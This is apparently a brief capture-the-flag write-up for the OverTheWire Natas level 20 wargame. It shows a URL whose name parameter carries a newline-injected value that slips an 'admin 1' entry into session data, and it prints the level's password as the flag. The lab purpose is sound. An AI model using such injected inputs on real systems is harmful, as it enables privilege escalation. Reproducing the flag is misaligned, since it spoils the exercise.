here we exploit a logic error in the source code. we give this input

hello 
admin 1

and after 2 entrances we’ll get the password.

http://natas20.natas.labs.overthewire.org/index.php?name=hello%0Aadmin%201

Flag: BPhv63cKE1lkQl04cE5CuFTzXe15NfiH